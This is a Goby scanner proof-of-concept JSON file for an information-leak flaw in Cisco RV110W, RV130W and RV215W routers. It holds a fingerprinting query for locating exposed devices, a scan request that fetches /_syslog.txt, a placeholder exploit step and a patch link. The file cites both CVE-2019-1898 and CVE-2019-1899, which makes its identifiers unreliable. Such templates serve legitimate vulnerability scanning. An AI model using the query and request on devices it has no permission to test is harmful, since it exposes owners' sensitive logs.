mirror of https://github.com/qwqdanchun/Goby.git
136 lines
5.5 KiB
JSON
136 lines
5.5 KiB
JSON
{
|
||
"Name": "Cisco RV110W RV130W RV215W router Information leakage",
|
||
"Description": "<p>Cisco RV110W, etc. are all a VPN firewall router of Cisco. An authorization issue vulnerability exists in Cisco RV110W, RV130W, and RV215W. </p><p>A remote attacker can read the syslog file of the device,The syslog log may contain important and sensitive information, thereby threatening the security of the entire system.</p>",
|
||
"Product": "Cisco-RV130W",
|
||
"Homepage": "https://www.cisco.com/",
|
||
"DisclosureDate": "2021-10-13",
|
||
"Author": "keeeee",
|
||
"FofaQuery": "body=\"image/login_progress.gif\" && title=\"Login Page\" && cert=\"Cisco Small Business\"",
|
||
"GobyQuery": "body=\"image/login_progress.gif\" && title=\"Login Page\" && cert=\"Cisco Small Business\"",
|
||
"Level": "0",
|
||
"CveID": "CVE-2019-1899",
|
||
"Tags": [
|
||
"infoleak"
|
||
],
|
||
"VulType": [
|
||
"infoleak"
|
||
],
|
||
"Impact": "<p><span style=\"font-size: 16px;\">A remote attacker can read the syslog file of the device,The syslog log may contain important and sensitive information, thereby threatening the security of the entire system.</span><br></p>",
|
||
"References": [
|
||
"https://nvd.nist.gov/vuln/detail/CVE-2019-1898"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": null,
|
||
"is0day": false,
|
||
"ExpTips": {
|
||
"type": "Tips",
|
||
"content": ""
|
||
},
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "Cisco RV110W RV130W RV215W 路由器 _syslog.txt 文件敏感信息泄露漏洞",
|
||
"Product": "Cisco-RV130W",
|
||
"VulType": ["信息泄露"],
|
||
"Tags": ["信息泄露"],
|
||
"Description": "<p>Cisco RV110W 等都是美国思科(Cisco)公司的一款 VPN 防火墙路由器。</p><p> Cisco RV110W、RV130W和RV215W中存在授权问题漏洞。远程攻击者可以通过该漏洞读取设备的 syslog 文件,其中 syslog 日志可能包含重要敏感信息,从而威胁整个系统安全。</p>",
|
||
"Impact": "<p>远程攻击者可以通过该漏洞读取设备的 syslog 文件,其中 syslog 日志可能包含重要敏感信息,从而威胁整个系统安全。<br></p>",
|
||
"Recommendation": "<p>厂商已修复该漏洞,补丁获取链接:<a href=\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess\" target=\"_blank\">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess</a> 。<br></p>"
|
||
},
|
||
"EN": {
|
||
"Name": "Cisco RV110W RV130W RV215W router Information leakage vulnerability",
|
||
"Description": "<p>Cisco RV110W, etc. are all a VPN firewall router of Cisco. An authorization issue vulnerability exists in Cisco RV110W, RV130W, and RV215W. </p><p>A remote attacker can read the syslog file of the device,The syslog log may contain important and sensitive information, thereby threatening the security of the entire system.</p>",
|
||
"VulType": [
|
||
"info-disclosure"
|
||
],
|
||
"Impact": "<p><span style=\"font-size: 16px;\">A remote attacker can read the syslog file of the device,The syslog log may contain important and sensitive information, thereby threatening the security of the entire system.</span><br></p>",
|
||
"Recommendation": "<p>The vendor has fixed the vulnerability, and the link to obtain the patch:<a href=\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess\">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess</a></p>",
|
||
"Tags": [
|
||
"info-disclosure"
|
||
],
|
||
"Product": "Cisco-RV130W"
|
||
}
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/_syslog.txt",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "new AAA",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "Ethernet LAN",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"status": "0",
|
||
"CNNVD": "",
|
||
"CNVD": "",
|
||
"Recommendation": "<p>The vendor has fixed the vulnerability, and the link to obtain the patch:<a href=\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess\">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess</a></p>",
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/test.php",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "test",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"CVE": "CVE-2019-1898",
|
||
"CVSSScore": "5.3"
|
||
} |